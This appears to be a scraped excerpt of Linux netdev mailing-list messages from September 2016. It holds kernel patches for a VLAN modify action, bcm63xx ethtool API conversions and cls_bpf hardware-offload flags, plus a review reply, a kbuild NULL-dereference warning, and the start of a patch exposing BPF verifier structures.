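/* 802.1Q TCI layout: priority in bits 15..13, DEI/CFI in bit 12,
 * VLAN ID in bits 11..0. */
#define TCI_PRIO_MASK  0xe000u
#define TCI_PRIO_SHIFT 13
#define TCI_VID_MASK   0x0fffu

/* Return tci with its VLAN ID replaced by new_vid.  The priority bits
 * are only replaced when new_prio is non-zero; otherwise they, and the
 * DEI bit, are carried over from the original tag. */
static uint16_t tci_modify(uint16_t tci, uint16_t new_vid, uint8_t new_prio)
{
	assert(new_vid <= TCI_VID_MASK && new_prio <= 7);

	tci = (uint16_t)((tci & ~TCI_VID_MASK) | new_vid);
	if (new_prio) {
		tci = (uint16_t)(tci & ~TCI_PRIO_MASK);
		tci = (uint16_t)(tci | (new_prio << TCI_PRIO_SHIFT));
	}
	return tci;
}
```

A pop followed by a push would instead build the new tag from scratch, which is why the priority bits of the original tag would be lost in that case.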

Signed-off-by: Shmulik Ladkani 
---
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/sched/act_vlan.c| 29 -
 2 files changed, 29 insertions(+), 1 deletion(-)

diff --git a/include/uapi/linux/tc_act/tc_vlan.h b/include/uapi/linux/tc_act/tc_vlan.h
index be72b6e384..bddb272b84 100644
--- a/include/uapi/linux/tc_act/tc_vlan.h
+++ b/include/uapi/linux/tc_act/tc_vlan.h
@@ -16,6 +16,7 @@
 
 #define TCA_VLAN_ACT_POP   1
 #define TCA_VLAN_ACT_PUSH  2
+#define TCA_VLAN_ACT_MODIFY3
 
 struct tc_vlan {
tc_gen;
diff --git a/net/sched/act_vlan.c b/net/sched/act_vlan.c
index 59a8d3150a..e5eeaa7a01 100644
--- a/net/sched/act_vlan.c
+++ b/net/sched/act_vlan.c
@@ -30,6 +30,7 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
struct tcf_vlan *v = to_vlan(a);
int action;
int err;
+   u16 tci;
 
spin_lock(&v->tcf_lock);
tcf_lastuse_update(&v->tcf_tm);
@@ -48,6 +49,30 @@ static int tcf_vlan(struct sk_buff *skb, const struct tc_action *a,
if (err)
goto drop;
break;
+   case TCA_VLAN_ACT_MODIFY:
+   if (!skb_vlan_tagged(skb))
+   goto unlock;
+   /* extract existing tag (and guarantee no hwaccel tag) */
+   if (skb_vlan_tag_present(skb)) {
+   tci = skb_vlan_tag_get(skb);
+   skb->vlan_tci = 0;
+   } else {
+   if (skb->mac_len < VLAN_ETH_HLEN)
+   goto unlock;
+   err = __skb_vlan_pop(skb, &tci);
+   if (err)
+   goto drop;
+   }
+   /* replace the vid */
+   tci = (tci & ~VLAN_VID_MASK) | v->tcfv_push_vid;
+   /* replace prio bits, if tcfv_push_prio specified */
+   if (v->tcfv_push_prio) {
+   tci &= ~VLAN_PRIO_MASK;
+   tci |= v->tcfv_push_prio << VLAN_PRIO_SHIFT;
+   }
+   /* put updated tci as hwaccel tag */
+   __vlan_hwaccel_put_tag(skb, v->tcfv_push_proto, tci);
+   break;
default:
BUG();
}
@@ -102,6 +127,7 @@ static int tcf_vlan_init(struct net *net, struct nlattr *nla,
case TCA_VLAN_ACT_POP:
break;
case TCA_VLAN_ACT_PUSH:
+   case TCA_VLAN_ACT_MODIFY:
if (!tb[TCA_VLAN_PUSH_VLAN_ID]) {
if (exists)
tcf_hash_release(*a, bind);
@@ -185,7 +211,8 @@ static int tcf_vlan_dump(struct sk_buff *skb, struct tc_action *a,
if (nla_put(skb, TCA_VLAN_PARMS, sizeof(opt), &opt))
goto nla_put_failure;
 
-   if (v->tcfv_action == TCA_VLAN_ACT_PUSH &&
+   if ((v->tcfv_action == TCA_VLAN_ACT_PUSH ||
+v->tcfv_action == TCA_VLAN_ACT_MODIFY) &&
(nla_put_u16(skb, TCA_VLAN_PUSH_VLAN_ID, v->tcfv_push_vid) ||
 nla_put_be16(skb, TCA_VLAN_PUSH_VLAN_PROTOCOL,
  v->tcfv_push_proto) ||
-- 
2.7.4

[PATCH net-next 0/2] act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

2016-09-18 Thread Shmulik Ladkani

TCA_VLAN_ACT_MODIFY allows one to change an existing tag.

It accepts the same attributes as TCA_VLAN_ACT_PUSH (protocol, id,
priority).
If the packet is vlan tagged, the tag gets overwritten according to
the user-specified attributes.

For example, this allows the user to replace a tag's vid while preserving
its priority bits (as opposed to "action vlan pop pipe action vlan push").

Shmulik Ladkani (2):
  net: skbuff: Export __skb_vlan_pop
  net/sched: act_vlan: Introduce TCA_VLAN_ACT_MODIFY vlan action

 include/linux/skbuff.h  |  1 +
 include/uapi/linux/tc_act/tc_vlan.h |  1 +
 net/core/skbuff.c   |  7 +--
 net/sched/act_vlan.c| 29 -
 4 files changed, 35 insertions(+), 3 deletions(-)

-- 
2.7.4

Re: [net-next PATCH] net: netlink messages for HW addr programming

2016-09-18 Thread Roopa Prabhu

On 9/15/16, 9:48 AM, Patrick Ruddy wrote:
> Add RTM_NEWADDR and RTM_DELADDR netlink messages with family
> AF_UNSPEC to indicate interest in specific unicast and multicast
> hardware addresses. These messages are sent when addresses are
> added or deleted from the appropriate interface driver.
> Added AF_UNSPEC GETADDR function to allow the netlink notifications
> to be replayed to avoid loss of state due to application start
> ordering or restart.
>
> Signed-off-by: Patrick Ruddy 
> ---

RTM_NEWADDR and RTM_DELADDR are not used to add these entries to the kernel,
so it seems a bit wrong to use RTM_NEWADDR and RTM_DELADDR to notify
userspace about them and also to request a special dump of these addresses.

Could this just be a new nested netlink attribute in the existing link dump?

[net-next:master 136/385] net/sched/cls_route.c:565:22-26: ERROR: f is NULL but dereferenced.

2016-09-18 Thread kbuild test robot

tree:   https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git master
head:   fd9527f404d51e50f40dac0d9a69f2eff3dac33e
commit: b9a24bb76bf611a5268ceffe04219e6ad264559b [136/385] net_sched: properly handle failure case of tcf_exts_init()


coccinelle warnings: (new ones prefixed by >>)

>> net/sched/cls_route.c:565:22-26: ERROR: f is NULL but dereferenced.

vim +565 net/sched/cls_route.c

   549  *fp = f->next;
   550  break;
   551  }
   552  }
   553  }
   554  }
   555  
   556  route4_reset_fastmap(head);
   557  *arg = (unsigned long)f;
   558  if (fold) {
   559  tcf_unbind_filter(tp, &fold->res);
   560  call_rcu(&fold->rcu, route4_delete_filter);
   561  }
   562  return 0;
   563  
   564  errout:
 > 565  tcf_exts_destroy(&f->exts);
   566  kfree(f);
   567  return err;
   568  }
   569  
   570  static void route4_walk(struct tcf_proto *tp, struct tcf_walker *arg)
   571  {
   572  struct route4_head *head = rtnl_dereference(tp->root);
   573  unsigned int h, h1;

---
0-DAY kernel test infrastructure                Open Source Technology Center
https://lists.01.org/pipermail/kbuild-all                   Intel Corporation

[PATCH 2/2] net: ethernet: broadcom: bcm63xx: use new api ethtool_{get|set}_link_ksettings

2016-09-18 Thread Philippe Reynes

The ethtool API {get|set}_settings is deprecated.
Move this driver to the new API {get|set}_link_ksettings.
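
The main data-model change in the new API is that link modes are carried in bitmaps rather than in a single u32, which is why the patch converts the legacy masks. The following userspace sketch shows that kind of conversion under stated assumptions: the toy_* names and the 64-bit bitmap width are hypothetical, and this is not the kernel helper itself.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>
#include <string.h>

#define TOY_NBITS      64 /* hypothetical link-mode bitmap width */
#define BITS_PER_WORD  (sizeof(unsigned long) * CHAR_BIT)
#define TOY_WORDS      ((TOY_NBITS + BITS_PER_WORD - 1) / BITS_PER_WORD)

/* Clear the whole bitmap, then place the 32 legacy bits in the first
 * word so that legacy bit N becomes bitmap bit N. */
static void toy_u32_to_link_mode(unsigned long *dst, uint32_t legacy)
{
	memset(dst, 0, TOY_WORDS * sizeof(*dst));
	dst[0] = legacy;
}

/* Test a single bit of the bitmap. */
static int toy_test_bit(const unsigned long *map, unsigned int bit)
{
	assert(bit < TOY_NBITS);
	return (int)((map[bit / BITS_PER_WORD] >> (bit % BITS_PER_WORD)) & 1UL);
}
```

Bits beyond the first 32 stay clear after the conversion, so a driver that only knows the legacy modes never advertises anything it did not set.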

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/bcm63xx_enet.c |   52 ++
 1 files changed, 28 insertions(+), 24 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.c b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
index 082f3f0..ae364c7 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.c
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
@@ -1442,39 +1442,40 @@ static int bcm_enet_nway_reset(struct net_device *dev)
return -EOPNOTSUPP;
 }
 
-static int bcm_enet_get_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcm_enet_get_link_ksettings(struct net_device *dev,
+  struct ethtool_link_ksettings *cmd)
 {
struct bcm_enet_priv *priv;
+   u32 supported, advertising;
 
priv = netdev_priv(dev);
 
-   cmd->maxrxpkt = 0;
-   cmd->maxtxpkt = 0;
-
if (priv->has_phy) {
if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_gset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_get(dev->phydev, cmd);
} else {
-   cmd->autoneg = 0;
-   ethtool_cmd_speed_set(cmd, ((priv->force_speed_100)
-   ? SPEED_100 : SPEED_10));
-   cmd->duplex = (priv->force_duplex_full) ?
+   cmd->base.autoneg = 0;
+   cmd->base.speed = (priv->force_speed_100) ?
+   SPEED_100 : SPEED_10;
+   cmd->base.duplex = (priv->force_duplex_full) ?
DUPLEX_FULL : DUPLEX_HALF;
-   cmd->supported = ADVERTISED_10baseT_Half  |
+   supported = ADVERTISED_10baseT_Half |
ADVERTISED_10baseT_Full |
ADVERTISED_100baseT_Half |
ADVERTISED_100baseT_Full;
-   cmd->advertising = 0;
-   cmd->port = PORT_MII;
-   cmd->transceiver = XCVR_EXTERNAL;
+   advertising = 0;
+   ethtool_convert_legacy_u32_to_link_mode(
+   cmd->link_modes.supported, supported);
+   ethtool_convert_legacy_u32_to_link_mode(
+   cmd->link_modes.advertising, advertising);
+   cmd->base.port = PORT_MII;
}
return 0;
 }
 
-static int bcm_enet_set_settings(struct net_device *dev,
-struct ethtool_cmd *cmd)
+static int bcm_enet_set_link_ksettings(struct net_device *dev,
+  const struct ethtool_link_ksettings *cmd)
 {
struct bcm_enet_priv *priv;
 
@@ -1482,16 +1483,19 @@ static int bcm_enet_set_settings(struct net_device *dev,
if (priv->has_phy) {
if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_sset(dev->phydev, cmd);
+   return phy_ethtool_ksettings_set(dev->phydev, cmd);
} else {
 
-   if (cmd->autoneg ||
-   (cmd->speed != SPEED_100 && cmd->speed != SPEED_10) ||
-   cmd->port != PORT_MII)
+   if (cmd->base.autoneg ||
+   (cmd->base.speed != SPEED_100 &&
+cmd->base.speed != SPEED_10) ||
+   cmd->base.port != PORT_MII)
return -EINVAL;
 
-   priv->force_speed_100 = (cmd->speed == SPEED_100) ? 1 : 0;
-   priv->force_duplex_full = (cmd->duplex == DUPLEX_FULL) ? 1 : 0;
+   priv->force_speed_100 =
+   (cmd->base.speed == SPEED_100) ? 1 : 0;
+   priv->force_duplex_full =
+   (cmd->base.duplex == DUPLEX_FULL) ? 1 : 0;
 
if (netif_running(dev))
bcm_enet_adjust_link(dev);
@@ -1585,14 +1589,14 @@ static const struct ethtool_ops bcm_enet_ethtool_ops = {
.get_sset_count = bcm_enet_get_sset_count,
.get_ethtool_stats  = bcm_enet_get_ethtool_stats,
.nway_reset = bcm_enet_nway_reset,
-   .get_settings   = bcm_enet_get_settings,
-   .set_settings   = bcm_enet_set_settings,
.get_drvinfo= bcm_enet_get_drvinfo,
.get_link   = ethtool_op_get_link,
.get_ringparam  = bcm_enet_get_ringparam,
.set_ringparam  = bcm_enet_set_ringparam,
.get_pauseparam = bcm_enet_get_pauseparam,
.set_pauseparam = bcm_enet_set_pauseparam,
+   .get_link_ksettings = bcm_enet_get_link_ksettings,
+   .set_link_ksettings = bcm_enet_set_link_ksettings,
 };
 
 static int bcm_enet_ioctl(struct net_device *dev, struct ifreq *rq, int cmd)
-- 
1.7.4.4

[PATCH 1/2] net: ethernet: broadcom: bcm63xx: use phydev from struct net_device

2016-09-18 Thread Philippe Reynes

The private structure contains a pointer to phydev, but the structure
net_device already contains such a pointer. So we can remove the phydev
pointer from the private structure, and update the driver to use the
one contained in struct net_device.

Signed-off-by: Philippe Reynes 
---
 drivers/net/ethernet/broadcom/bcm63xx_enet.c |   31 +++--
 drivers/net/ethernet/broadcom/bcm63xx_enet.h |1 -
 2 files changed, 14 insertions(+), 18 deletions(-)

diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.c b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
index 6c8bc5f..082f3f0 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.c
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.c
@@ -791,7 +791,7 @@ static void bcm_enet_adjust_phy_link(struct net_device *dev)
int status_changed;
 
priv = netdev_priv(dev);
-   phydev = priv->phydev;
+   phydev = dev->phydev;
status_changed = 0;
 
if (priv->old_link != phydev->link) {
@@ -913,7 +913,6 @@ static int bcm_enet_open(struct net_device *dev)
priv->old_link = 0;
priv->old_duplex = -1;
priv->old_pause = -1;
-   priv->phydev = phydev;
}
 
/* mask all interrupts and request them */
@@ -1085,7 +1084,7 @@ static int bcm_enet_open(struct net_device *dev)
 ENETDMAC_IRMASK, priv->tx_chan);
 
if (priv->has_phy)
-   phy_start(priv->phydev);
+   phy_start(phydev);
else
bcm_enet_adjust_link(dev);
 
@@ -1127,7 +1126,7 @@ out_freeirq:
free_irq(dev->irq, dev);
 
 out_phy_disconnect:
-   phy_disconnect(priv->phydev);
+   phy_disconnect(phydev);
 
return ret;
 }
@@ -1190,7 +1189,7 @@ static int bcm_enet_stop(struct net_device *dev)
netif_stop_queue(dev);
napi_disable(&priv->napi);
if (priv->has_phy)
-   phy_stop(priv->phydev);
+   phy_stop(dev->phydev);
del_timer_sync(&priv->rx_timeout);
 
/* mask all interrupts */
@@ -1234,10 +1233,8 @@ static int bcm_enet_stop(struct net_device *dev)
free_irq(dev->irq, dev);
 
/* release phy */
-   if (priv->has_phy) {
-   phy_disconnect(priv->phydev);
-   priv->phydev = NULL;
-   }
+   if (priv->has_phy)
+   phy_disconnect(dev->phydev);
 
return 0;
 }
@@ -1437,9 +1434,9 @@ static int bcm_enet_nway_reset(struct net_device *dev)
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return genphy_restart_aneg(priv->phydev);
+   return genphy_restart_aneg(dev->phydev);
}
 
return -EOPNOTSUPP;
@@ -1456,9 +1453,9 @@ static int bcm_enet_get_settings(struct net_device *dev,
cmd->maxtxpkt = 0;
 
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_gset(priv->phydev, cmd);
+   return phy_ethtool_gset(dev->phydev, cmd);
} else {
cmd->autoneg = 0;
ethtool_cmd_speed_set(cmd, ((priv->force_speed_100)
@@ -1483,9 +1480,9 @@ static int bcm_enet_set_settings(struct net_device *dev,
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_ethtool_sset(priv->phydev, cmd);
+   return phy_ethtool_sset(dev->phydev, cmd);
} else {
 
if (cmd->autoneg ||
@@ -1604,9 +1601,9 @@ static int bcm_enet_ioctl(struct net_device *dev, struct ifreq *rq, int cmd)
 
priv = netdev_priv(dev);
if (priv->has_phy) {
-   if (!priv->phydev)
+   if (!dev->phydev)
return -ENODEV;
-   return phy_mii_ioctl(priv->phydev, rq, cmd);
+   return phy_mii_ioctl(dev->phydev, rq, cmd);
} else {
struct mii_if_info mii;
 
diff --git a/drivers/net/ethernet/broadcom/bcm63xx_enet.h b/drivers/net/ethernet/broadcom/bcm63xx_enet.h
index f55af43..0a1b7b2 100644
--- a/drivers/net/ethernet/broadcom/bcm63xx_enet.h
+++ b/drivers/net/ethernet/broadcom/bcm63xx_enet.h
@@ -290,7 +290,6 @@ struct bcm_enet_priv {
 
/* used when a phy is connected (phylib used) */
struct mii_bus *mii_bus;
-   struct phy_device *phydev;
int old_link;
int old_duplex;
int old_pause;
-- 
1.7.4.4

[PATCHv6 net-next 03/15] net: cls_bpf: add support for marking filters as hardware-only

2016-09-18 Thread Jakub Kicinski

Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_SW flag.
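
The error policy this implies for a newly added filter can be summarised in a small userspace sketch: with skip_sw set, a failure to offload is fatal, otherwise it is silently ignored and the filter runs in software. toy_offload_add and its parameters are hypothetical, and the replace/destroy paths of the patch are left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Decide the return value for adding a filter.
 *   can_offload: whether the device is willing to take the filter
 *   skip_sw:     whether the user asked for hardware-only operation
 *   driver_ret:  0 or a negative errno reported by the driver */
static int toy_offload_add(bool can_offload, bool skip_sw, int driver_ret)
{
	assert(driver_ret <= 0);

	if (!can_offload)
		return skip_sw ? -EINVAL : 0;
	if (driver_ret)
		return skip_sw ? driver_ret : 0;
	return 0;
}
```

Only the hardware-only case propagates an error, so existing users that never set the flag see no change in behaviour.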

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
 net/sched/cls_bpf.c | 34 +-
 1 file changed, 25 insertions(+), 9 deletions(-)

diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 46af423a8a8f..18f9869cd4da 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -28,7 +28,7 @@ MODULE_DESCRIPTION("TC BPF based classifier");
 
 #define CLS_BPF_NAME_LEN   256
 #define CLS_BPF_SUPPORTED_GEN_FLAGS\
-   TCA_CLS_FLAGS_SKIP_HW
+   (TCA_CLS_FLAGS_SKIP_HW | TCA_CLS_FLAGS_SKIP_SW)
 
 struct cls_bpf_head {
struct list_head plist;
@@ -95,7 +95,9 @@ static int cls_bpf_classify(struct sk_buff *skb, const struct tcf_proto *tp,
 
qdisc_skb_cb(skb)->tc_classid = prog->res.classid;
 
-   if (at_ingress) {
+   if (tc_skip_sw(prog->gen_flags)) {
+   filter_res = prog->exts_integrated ? TC_ACT_UNSPEC : 0;
+   } else if (at_ingress) {
/* It is safe to push/pull even if skb_shared() */
__skb_push(skb, skb->mac_len);
bpf_compute_data_end(skb);
@@ -163,32 +165,42 @@ static int cls_bpf_offload_cmd(struct tcf_proto *tp, struct cls_bpf_prog *prog,
 tp->protocol, &offload);
 }
 
-static void cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
-   struct cls_bpf_prog *oldprog)
+static int cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
+  struct cls_bpf_prog *oldprog)
 {
struct net_device *dev = tp->q->dev_queue->dev;
struct cls_bpf_prog *obj = prog;
enum tc_clsbpf_command cmd;
+   bool skip_sw;
+   int ret;
+
+   skip_sw = tc_skip_sw(prog->gen_flags) ||
+   (oldprog && tc_skip_sw(oldprog->gen_flags));
 
if (oldprog && oldprog->offloaded) {
if (tc_should_offload(dev, tp, prog->gen_flags)) {
cmd = TC_CLSBPF_REPLACE;
-   } else {
+   } else if (!tc_skip_sw(prog->gen_flags)) {
obj = oldprog;
cmd = TC_CLSBPF_DESTROY;
+   } else {
+   return -EINVAL;
}
} else {
if (!tc_should_offload(dev, tp, prog->gen_flags))
-   return;
+   return skip_sw ? -EINVAL : 0;
cmd = TC_CLSBPF_ADD;
}
 
-   if (cls_bpf_offload_cmd(tp, obj, cmd))
-   return;
+   ret = cls_bpf_offload_cmd(tp, obj, cmd);
+   if (ret)
+   return skip_sw ? ret : 0;
 
obj->offloaded = true;
if (oldprog)
oldprog->offloaded = false;
+
+   return 0;
 }
 
 static void cls_bpf_stop_offload(struct tcf_proto *tp,
@@ -496,7 +508,11 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
if (ret < 0)
goto errout;
 
-   cls_bpf_offload(tp, prog, oldprog);
+   ret = cls_bpf_offload(tp, prog, oldprog);
+   if (ret) {
+   cls_bpf_delete_prog(tp, prog);
+   return ret;
+   }
 
if (oldprog) {
list_replace_rcu(&oldprog->link, &prog->link);
-- 
1.9.1

[PATCHv6 net-next 02/15] net: cls_bpf: limit hardware offload by software-only flag

2016-09-18 Thread Jakub Kicinski

Add cls_bpf support for the TCA_CLS_FLAGS_SKIP_HW flag.
Unlike U32 and flower, cls_bpf already has some netlink
flags defined.  Create a new attribute to be able to use
the same flag values as the above.

Unlike U32 and flower, reject unknown flags.
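
"Reject unknown flags" amounts to a mask test against the set of supported bits, followed by a consistency check. A minimal userspace sketch, assuming two stand-in flag bits (TOY_FLAG_SKIP_HW and TOY_FLAG_SKIP_SW are illustrative names, and toy_check_gen_flags is not a kernel function):

```c
#include <assert.h>
#include <stdint.h>

/* Stand-ins for the generic classifier flags. */
#define TOY_FLAG_SKIP_HW (1u << 0)
#define TOY_FLAG_SKIP_SW (1u << 1)

/* Return 0 if flags may be accepted, -1 otherwise.
 *   - any bit outside 'supported' is rejected rather than cleared;
 *   - asking to skip both hardware and software makes no sense. */
static int toy_check_gen_flags(uint32_t flags, uint32_t supported)
{
	const uint32_t both = TOY_FLAG_SKIP_HW | TOY_FLAG_SKIP_SW;

	assert((supported & ~both) == 0);

	if (flags & ~supported)
		return -1;
	if ((flags & both) == both)
		return -1;
	return 0;
}
```

Rejecting instead of clearing means that userspace learns immediately when it runs on a kernel that does not understand a flag, rather than having the request silently downgraded.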

Signed-off-by: Jakub Kicinski 
Acked-by: Daniel Borkmann 
---
v3:
 - reject (instead of clear) unsupported flags;
 - fix error handling.
v2:
 - rename TCA_BPF_GEN_TCA_FLAGS -> TCA_BPF_FLAGS_GEN;
 - add comment about clearing unsupported flags;
 - validate flags after clearing unsupported.
---
 include/net/pkt_cls.h|  1 +
 include/uapi/linux/pkt_cls.h |  1 +
 net/sched/cls_bpf.c  | 22 --
 3 files changed, 22 insertions(+), 2 deletions(-)

diff --git a/include/net/pkt_cls.h b/include/net/pkt_cls.h
index 41e8071dff87..57af9f3032ff 100644
--- a/include/net/pkt_cls.h
+++ b/include/net/pkt_cls.h
@@ -498,6 +498,7 @@ struct tc_cls_bpf_offload {
struct bpf_prog *prog;
const char *name;
bool exts_integrated;
+   u32 gen_flags;
 };
 
 #endif
diff --git a/include/uapi/linux/pkt_cls.h b/include/uapi/linux/pkt_cls.h
index 8915b61bbf83..8fd715f806a2 100644
--- a/include/uapi/linux/pkt_cls.h
+++ b/include/uapi/linux/pkt_cls.h
@@ -396,6 +396,7 @@ enum {
TCA_BPF_FD,
TCA_BPF_NAME,
TCA_BPF_FLAGS,
+   TCA_BPF_FLAGS_GEN,
__TCA_BPF_MAX,
 };
 
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 3ca9502a881c..46af423a8a8f 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -27,6 +27,8 @@ MODULE_AUTHOR("Daniel Borkmann ");
 MODULE_DESCRIPTION("TC BPF based classifier");
 
 #define CLS_BPF_NAME_LEN   256
+#define CLS_BPF_SUPPORTED_GEN_FLAGS\
+   TCA_CLS_FLAGS_SKIP_HW
 
 struct cls_bpf_head {
struct list_head plist;
@@ -40,6 +42,7 @@ struct cls_bpf_prog {
struct tcf_result res;
bool exts_integrated;
bool offloaded;
+   u32 gen_flags;
struct tcf_exts exts;
u32 handle;
union {
@@ -55,6 +58,7 @@ struct cls_bpf_prog {
 static const struct nla_policy bpf_policy[TCA_BPF_MAX + 1] = {
[TCA_BPF_CLASSID]   = { .type = NLA_U32 },
[TCA_BPF_FLAGS] = { .type = NLA_U32 },
+   [TCA_BPF_FLAGS_GEN] = { .type = NLA_U32 },
[TCA_BPF_FD]= { .type = NLA_U32 },
[TCA_BPF_NAME]  = { .type = NLA_NUL_STRING, .len = CLS_BPF_NAME_LEN },
[TCA_BPF_OPS_LEN]   = { .type = NLA_U16 },
@@ -153,6 +157,7 @@ static int cls_bpf_offload_cmd(struct tcf_proto *tp, struct cls_bpf_prog *prog,
bpf_offload.prog = prog->filter;
bpf_offload.name = prog->bpf_name;
bpf_offload.exts_integrated = prog->exts_integrated;
+   bpf_offload.gen_flags = prog->gen_flags;
 
return dev->netdev_ops->ndo_setup_tc(dev, tp->q->handle,
 tp->protocol, &offload);
@@ -166,14 +171,14 @@ static void cls_bpf_offload(struct tcf_proto *tp, struct cls_bpf_prog *prog,
enum tc_clsbpf_command cmd;
 
if (oldprog && oldprog->offloaded) {
-   if (tc_should_offload(dev, tp, 0)) {
+   if (tc_should_offload(dev, tp, prog->gen_flags)) {
cmd = TC_CLSBPF_REPLACE;
} else {
obj = oldprog;
cmd = TC_CLSBPF_DESTROY;
}
} else {
-   if (!tc_should_offload(dev, tp, 0))
+   if (!tc_should_offload(dev, tp, prog->gen_flags))
return;
cmd = TC_CLSBPF_ADD;
}
@@ -369,6 +374,7 @@ static int cls_bpf_modify_existing(struct net *net, struct tcf_proto *tp,
 {
bool is_bpf, is_ebpf, have_exts = false;
struct tcf_exts exts;
+   u32 gen_flags = 0;
int ret;
 
is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
@@ -393,8 +399,17 @@ static int cls_bpf_modify_existing(struct net *net, struct tcf_proto *tp,
 
have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
}
+   if (tb[TCA_BPF_FLAGS_GEN]) {
+   gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
+   if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
+   !tc_flags_valid(gen_flags)) {
+   ret = -EINVAL;
+   goto errout;
+   }
+   }
 
prog->exts_integrated = have_exts;
+   prog->gen_flags = gen_flags;
 
ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
   cls_bpf_prog_from_efd(tb, prog, tp);
@@ -566,6 +581,9 @@ static int cls_bpf_dump(struct net *net, struct tcf_proto *tp, unsigned long fh,
bpf_flags |= TCA_BPF_FLAG_ACT_DIRECT;
if (bpf_flags && nla_put_u32(skb, TCA_BPF_FLAGS, bpf_flags))
goto nla_put_failure;
+   if (prog->gen_flags &&
+   nla_put_u32(skb, TCA_BPF_FLAGS_GEN, prog->gen_flags))
+   goto nla_put_failure;

[PATCHv6 net-next 05/15] bpf: expose internal verifier structures

2016-09-18 Thread Jakub Kicinski

Move verifier's internal structures to a header file and
prefix their names with bpf_ to avoid potential namespace
conflicts.  Those structures will soon be used by external
analyzers.

Signed-off-by: Jakub Kicinski 
Acked-by: Alexei Starovoitov 
Acked-by: Daniel Borkmann 
---
v5:
 - fix name of guard defines.
v4:
 - separate from adding the analyzer;
 - squash with the prefixing patch.
---
 include/linux/bpf_verifier.h |  78 +
 kernel/bpf/verifier.c| 263 +--
 2 files changed, 180 insertions(+), 161 deletions(-)
 create mode 100644 include/linux/bpf_verifier.h

diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
new file mode 100644
index ..9056117b4a81
--- /dev/null
+++ b/include/linux/bpf_verifier.h
@@ -0,0 +1,78 @@
+/* Copyright (c) 2011-2014 PLUMgrid, http://plumgrid.com
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of version 2 of the GNU General Public
+ * License as published by the Free Software Foundation.
+ */
+#ifndef _LINUX_BPF_VERIFIER_H
+#define _LINUX_BPF_VERIFIER_H 1
+
+#include  /* for enum bpf_reg_type */
+#include  /* for MAX_BPF_STACK */
+
+struct bpf_reg_state {
+   enum bpf_reg_type type;
+   union {
+   /* valid when type == CONST_IMM | PTR_TO_STACK | UNKNOWN_VALUE 
*/
+   s64 imm;
+
+   /* valid when type == PTR_TO_PACKET* */
+   struct {
+   u32 id;
+   u16 off;
+   u16 range;
+   };
+
+   /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
+*   PTR_TO_MAP_VALUE_OR_NULL
+*/
+   struct bpf_map *map_ptr;
+   };
+};
+
+enum bpf_stack_slot_type {
+   STACK_INVALID,/* nothing was stored in this stack slot */
+   STACK_SPILL,  /* register spilled into stack */
+   STACK_MISC/* BPF program wrote some data into this slot */
+};
+
+#define BPF_REG_SIZE 8 /* size of eBPF register in bytes */
+
+/* state of the program:
+ * type of all registers and stack info
+ */
+struct bpf_verifier_state {
+   struct bpf_reg_state regs[MAX_BPF_REG];
+   u8 stack_slot_type[MAX_BPF_STACK];
+   struct bpf_reg_state spilled_regs[MAX_BPF_STACK / BPF_REG_SIZE];
+};
+
+/* linked list of verifier states used to prune search */
+struct bpf_verifier_state_list {
+   struct bpf_verifier_state state;
+   struct bpf_verifier_state_list *next;
+};
+
+struct bpf_insn_aux_data {
+   enum bpf_reg_type ptr_type; /* pointer type for load/store insns */
+};
+
+#define MAX_USED_MAPS 64 /* max number of maps accessed by one eBPF program */
+
+/* single container for all structs
+ * one verifier_env per bpf_check() call
+ */
+struct bpf_verifier_env {
+   struct bpf_prog *prog;  /* eBPF program being verified */
+   struct bpf_verifier_stack_elem *head; /* stack of verifier states to be 
processed */
+   int stack_size; /* number of states to be processed */
+   struct bpf_verifier_state cur_state; /* current verifier state */
+   struct bpf_verifier_state_list **explored_states; /* search pruning 
optimization */
+   struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by 
eBPF program */
+   u32 used_map_cnt;   /* number of used maps */
+   u32 id_gen; /* used to generate unique reg IDs */
+   bool allow_ptr_leaks;
+   struct bpf_insn_aux_data *insn_aux_data; /* array of per-insn state */
+};
+
